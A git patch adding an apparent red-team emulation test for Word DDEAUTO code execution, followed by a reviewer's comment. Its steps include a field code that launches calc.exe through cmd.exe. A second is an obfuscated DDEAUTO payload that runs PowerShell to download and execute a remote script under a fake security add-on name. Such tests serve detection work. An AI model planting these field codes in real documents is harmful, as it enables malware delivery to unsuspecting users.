From d508caaffd74959c76e2f6ae96b90d5671890c7a Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 10:50:52 -0400
Subject: [PATCH] T1137 No .. for Casey Other than the actual ..'s that are in the repo that are legit from Github..
---
atomics/T1137/T1137.yaml | 39 +++++++++++++++++++++++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 atomics/T1137/T1137.yaml
diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml
new file mode 100644
index 00000000..0521f24b
--- /dev/null
+++ b/atomics/T1137/T1137.yaml
@@ -0,0 +1,39 @@
+---
+attack_technique: T1137
+display_name: Office Application Startup
+
+atomic_tests:
+- name: DDEAUTO
+ description: |
+
+ TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
+
+ SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
+
+ Word VBA Macro
+
+ [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: manual
+ steps: |
+ 1. Open Word
+
+ 2. Insert tab -> Quick Parts -> Field
+
+ 3. Choose = (Formula) and click ok.
+
+ 4. Once the field is inserted, you should now see "!Unexpected End of Formula"
+
+ 5. Right-click the Field, choose "Toggle Field Codes"
+
+ 6. Paste in the code from Unicorn or SensePost
+
+ 7. Save the Word document.
+
+ 9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
+
+ 10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # " "Microsoft Document Security Add-On"
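Review bot: The `steps` list jumps from 7 to 9, and items 9 and 10 are not actions but the sample field codes that step 6 tells the tester to paste, so the procedure reads as if a step had been lost. I would renumber and label them, for example `8. Example field codes for step 6:` followed by the two DDEAUTO lines, and mark the empty host in `http:///download.ps1` as an explicit placeholder, since it looks like a redaction rather than a usable value. The `description` block is only a list of links; one sentence on what the test demonstrates and what to verify afterwards (presumably Word spawning `cmd.exe` as a child process after the DDE update prompts) would make it usable for validating detections. DDE field execution may also map better to T1173 (Dynamic Data Exchange) than to T1137, so the technique ID is worth confirming before coverage is reported against it.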